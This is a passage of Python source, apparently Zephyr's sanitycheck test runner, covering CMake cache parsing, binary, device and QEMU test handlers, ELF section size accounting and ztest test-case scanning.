fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
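# Illustrative sketch (not part of the original file): parsing typical cache lines.
#
#   CMakeCacheEntry.from_line('CONFIG_BOARD:STRING=qemu_x86', 7)
#       -> CMakeCacheEntry(name=CONFIG_BOARD, value=qemu_x86)
#   CMakeCacheEntry.from_line('CXX_FLAGS:STRING=-Wall;-Wextra', 8).value
#       -> ['-Wall', '-Wextra']          # ';'-separated values become Python lists
#   CMakeCacheEntry.from_line('// a comment line', 9)
#       -> None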
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# Encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work: newer ninja versions don't seem to pass SIGTERM down to their
# children, so we need try_kill_process_by_pid as well.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
# We may have polled nothing because the host did not
# schedule the QEMU process enough CPU time during
# p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case send SIGKILL to the QEMU process directly and
# let sanitycheck judge the test result from the console output.
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_area",
"_k_timer_area",
"_k_mem_slab_area",
"_k_mem_pool_area",
"sw_isr_table",
"_k_sem_area",
"_k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"_k_stack_area",
"_k_msgq_area",
"_k_mbox_area",
"_k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"_k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"object_access",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"_settings_handlers_area",
"_bt_channels_area",
"_bt_br_channels_area",
"_bt_services_area",
"vectors",
"net_socket_register",
"net_ppp_proto"
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
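# Hedged example (assumed source, not from the original tree): for a main.c
# containing
#
#   ztest_test_suite(mutex_complex,
#       ztest_unit_test(test_mutex_lock),
#       ztest_user_unit_test(test_mutex_unlock));
#   ztest_run_test_suite(mutex_complex);
#
# scan_file() would be expected to return (["mutex_lock", "mutex_unlock"], None):
# the "test_" prefix is stripped and no #ifdef/#endif warning is produced.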
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
